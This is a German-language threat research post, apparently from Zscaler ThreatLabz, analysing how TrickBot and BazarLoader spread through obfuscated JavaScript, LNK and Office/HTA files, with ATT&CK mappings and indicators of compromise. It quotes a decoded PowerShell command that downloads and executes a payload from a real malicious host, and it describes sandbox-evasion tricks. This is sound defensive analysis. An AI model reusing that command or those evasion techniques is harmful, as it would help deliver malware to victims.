Einblicke und Forschung

Neue TrickBot- und BazarLoader-Kampagnen nutzen mehrere Übertragungsvektoren

Neue TrickBot- und BazarLoader-Kampagnen nutzen mehrere Übertragungsvektoren

Das Forschungsteam von Zscaler ThreatLabz überwacht täglich Tausende von Dateien, die neue und häufigste Bedrohungen verfolgen, einschließlich eines der bekanntesten Banktrojaner der letzten fünf Jahre: TrickBot. TrickBot ist seit 2016 aktiv und steht in Verbindung mit einer Vielzahl bösartiger Kampagnen, die Bitcoin-Mining und den Diebstahl von Bankdaten, persönlichen Identifikationsdaten und Zugangsdaten beinhalten. BazarLoader ist ein Spinoff dieses Trojaners, der von denselben Betreibern entwickelt wurde. Beide sind besonders gefährlich, da sie leicht modifizierbar und in der Lage sind, mehrstufige Payloads zu transportieren und Computer vollständig zu übernehmen.

ThreatLabz hat entdeckt, dass TrickBot-Betreiber in ihren jüngsten Angriffskampagnen neue Methoden zur Übermittlung von Payloads verwenden. Die von uns analysierten Malware-Proben waren gut durchdacht und in hohem Maße verschleiert, sodass die Sandbox umgangen werden konnte. In diesem Blog-Beitrag nehmen wir eine Analyse der verschiedenen von TrickBot und BazarLoader verwendeten Übertragungsvektoren vor.

Wichtige Punkte:

1. Script- und LNK-Dateien fügten Ausweichtechniken hinzu, um Malware-Bedrohungen umzusetzen.

2. Mehrschichtige Verschleierung wird verwendet, um die Analyse von JS- und LNK-Dateien auszuschließen.

3. Ein Office-Anhang legt eine HTA-Datei mit Snippets von HTML- und Javascript-Funktionen ab.

4. Neu registrierte Domänen werden zur Verbreitung von Bedrohungen genutzt.

TrickBot erweitert seine Dateitypen für die Verbreitung von Malware

In früheren Kampagnen wurden TrickBot-Payloads in der Regel als schädliche Anhänge an Microsoft Office-Dateien versendet. Im letzten Monat haben wir festgestellt, dass Malware auch ein hohes Volumen von Javascript-Dateien sowie eine Reihe anderer Dateiformate verwendet hat, wie in den folgenden Diagrammen dargestellt:

 Insgesamt in der Sandbox blockierter TrickBot

Abb. 1: TrickBot in der Zscaler Cloud Sandbox blockiert

Insgesamt in der Sandbox blockierter Bazar

Abb. 2: BazarLoader in der Zscaler Cloud Sandbox blockiert

In diesem Blog untersuchen wir die Abfolge von Angriffsphasen für mehrere Übertragungsvektoren, einschließlich: 

  • TrickBot verbreitet sich über Skriptdateien
  • TrickBot verbreitet sich über LNK-Dateien
  • BazarLoader verbreitet sich über Office-Anhänge

TrickBot verbreitet sich über Skriptdateien

Trickbot dringt über Spam-E-Mails ein, die bösartige Javascript-Anhänge enthalten, zum Beispiel:  

Spam

Abb. 3: Spam-E-Mail-Anhang

In diesem Fall verfügt die Javascript-Datei [5B606A5495A55F2BD8559778A620F21B] über drei Verschleierungsschichten, die hauptsächlich zum Ausblenden und Umgehen von Sandbox-Umgebungen verwendet werden. Hier ein Snapshot der ersten verschleierten Schicht:

Erste verschleierte Schicht

Abb. 4: Erste Verschleierungsschicht in Javascript

Die Malware-Betreiber haben nicht nur extreme Anstrengungen unternommen, um Javascript-Dateien stark zu verschleiern, sondern auch große Mengen an Junk-Code am Ende hinzugefügt, um die Fehlersuche zu erschweren. Der Junk-Code besteht nur aus zufällig generierten verschleierten Zeichenfolgen, die nichts mit dem Schadcode zu tun haben.

Junk-Code, der die Analyse erschwert

Abb. 5: Junk-Code, der die Analyse erschwert

Mithilfe der Funktion eval() haben wir die zweite Schicht, in die Schadcode und noch mehr Junk-Code eingebettet ist, aufgedeckt. Nach dem Entfernen dieser Junk-Code-Schicht wird die Funktion eval() noch einmal verwendet, um die letzte Code-Schicht abzurufen. Wir können sehen, dass die TrickBot-Betreiber die Methode setTimeout() verwendet haben, die einen Ausdruck nach 967 Millisekunden auswertet, um die Ausführung in der Sandbox zu verzögern. Dies hilft der Malware, Sandbox-Umgebungen zu umgehen.

Zweite Schicht

Abb. 6: Zweite Verschleierungsschicht in Javascript

Im obigen Snapshot können wir sehen, wie die Methode replace im Code implementiert ist, bei der die Zeichenfolgen „hdBDJ“ und „tSJVh“ aus den Variablen „YHPhEFtKjqbCmAZ“ bzw. „kVYJOrLSqvdAWnaGTX“ entfernt werden, um die endgültige Zeichenfolge zu erhalten.

Letzte Schicht

Abb. 7: Letzte Schicht

Das bösartige Javascript führt cmd.exe als untergeordneten Prozess aus, woraufhin cmd.exe powershell.exe ausführt, um TrickBot als Payload herunterzuladen. 

Ausführungsabfolge: 

Wscript.exe -> cmd.exe -> powershell.exe

Powershell.exe ist mit einem base64-kodierten Befehl eingebettet und nach der Dekodierung lautet der folgende Befehl:

IEX (New-Object Net.Webclient).downloadstring(https://jolantagraban{.}pl/log/57843441668980/dll/assistant{.}php")

JS Sandbox

Abb. 8: Zscaler Cloud Sandbox-Erkennung von Javascript-Downloader

TrickBot verbreitet sich über LNK-Dateien

Windows LNK (LNK)-Erweiterungen werden von Usern in der Regel als Verknüpfungen angesehen und wir beobachten häufig, dass Cyberkriminelle LNK-Dateien nutzen, um bösartige Dateien wie TrickBot herunterzuladen. TrickBot blendet den Code im Argumentbereich im Eigenschaftenbereich der LNK-Datei aus. Der Betreiber der Malware fügte zusätzliche Leerzeichen zwischen dem bösartigen Code ein, um Forschern das Debuggen des Codes zu erschweren. Wir haben die Nutzung dieser Technik bereits in der Emotet-Kampagne 2018 anhand von bösartigen Office-Anhängen gesehen.

Letzte LNK

Abb. 9: In den Eigenschaftenbereich von LNK eingebetteter Code

TrickBot wird heruntergeladen:

  1. LNK lädt die Datei von 45.148.121.227/images/readytunes.png mit einem stillen Argument herunter, so dass der User keine Fehlermeldung oder Fortschrittsanzeige sehen kann.
  2. Nach dem Herunterladen speichert die Malware die Datei im Temp-Ordner unter dem Namen application1_form.pdf.
  3. Schließlich wird die Datei von application1_form.pdf in support.exe umbenannt und ausgeführt. support.exe ist in diesem Fall TrickBot.

Lnk Sandbox

Abb. 10: Zscaler Cloud Sandbox-Erkennung von LKN-Downloader

BazarLoader verbreitet sich über Office-Anhänge

Dies ist eine der anderen Techniken, die in TA551 APT, auch bekannt als Shathak, verwendet werden. Schädliche Office-Dokumente legen die HTA-Datei auf „C\ProgramData\sda.HTA“ ab. Diese HTA-Datei enthält HTML und vbscript, um eine bösartige DLL abzurufen und einen anfälligen Windows-Host mit BazarLoader zu infizieren. 

Sobald das Makro aktiviert ist, wird der Prozess mshta.exe ausgeführt, um ein Payload herunterzuladen. Diese Kampagne hat in der Vergangenheit bereits BazarLoader und TrickBot verbreitet.

Abb. 11: Abfolge von Angriffsphasen der DOC-Datei zum Herunterladen von BazarLoader

Base64-kodierte Daten werden in den HTML <div>-Tag implementiert, der später mit Javascript verwendet wird.

HTA_HTML

Abb. 12: Abgelegte HTA-Datei: Bösartige base64-Kodierung unter HTML <div>-Abschnitt

Nachfolgend ein Snapshot dekodierter base64-Daten, in denen wir sehen können, wie das Payload heruntergeladen und als „friendIFriend.jpg“-Datei auf dem Computer des Opfers gespeichert wird:

Dekodierte HTA

Abb. 13: Abgelegte HTA-Datei: Dekodierte base64-Daten

Netzwerk: C&C zum Herunterladen von BazarLoader

Netzwerk

Abb. 14: Senden der Anfrage zum Herunterladen von BazarLoader

Wir haben auch neu registrierte Domains (NRDs) beobachtet, die speziell für die Verbreitung dieser Payloads erstellt wurden. Dabei wurde ein Stealer verwendet, der über Spam-E-Mails zugestellt und mit einem bösartigen Microsoft Office-Anhang gebündelt wurde.

NRD

Abb. 15: Neu registrierte Domain

DOC Sandbox

Abb. 16: Zscaler Cloud Sandbox-Erkennung von bösartigem Office Datei-Downloader

JS.Downloader.Trickbot

Win32.Backdoor.BazarLoader

VBA.Downloader.BazarLoader

MITRE ATT&CK

 

T5190

Sammeln von Informationen über das Opfernetzwerk

T1189

Drive-by Compromise

T1082

Erkennung von Systeminformationen

T1140

Verschleierung/Verschlüsselung von Dateien oder Daten wird aufgehoben

T1564

Artefakte ausblenden

T1027

Verschleierte Dateien oder Daten

 

Gefährdungsindikatoren

 

MD5

Dateiname

Dateityp

B79AA1E30CD460B573114793CABDAFEB

100.js

JS

AB0BC0DDAB99FD245C8808D2984541FB

4821.js

JS

192D054C18EB592E85EBF6DE4334FA4D

4014.js

JS

21064644ED167754CF3B0C853C056F54

7776.js

JS

3B71E166590CD12D6254F7F8BB497F5A

7770.js

JS

5B606A5495A55F2BD8559778A620F21B

68.js

JS

BA89D7FC5C4A30868EA060D526DBCF56

Subcontractor Reviews (Sep 2021).lnk

LNK

 

MD5

Dateiname

Dateityp

C7298C4B0AF3279942B2FF630999E746

a087650f65f087341d07ea07aa89531624ad8c1671bc17751d3986e503bfb76.bin.sample.gz

DOC

3F06A786F1D4EA3402A3A23E61279931

-

DOC

 

Zugehörige URLs:

jolantagraban.pl/log/57843441668980/dll/assistant.php

blomsterhuset-villaflora.dk/assistant.php

d15k2d11r6t6rl.cloudfront.net/public/users/beefree

C&C:

Domain

Payload

jolantagraban.pl

TrickBot

glareestradad.com

BazarLoader

francopublicg.com

BazarLoader

 

Bleiben Sie auf dem Laufenden mit aktuellen Infos und Tipps für die digitale Transformation.

Durch Abschicken des Formulars stimmen Sie unserer Datenschutzerklärung zu.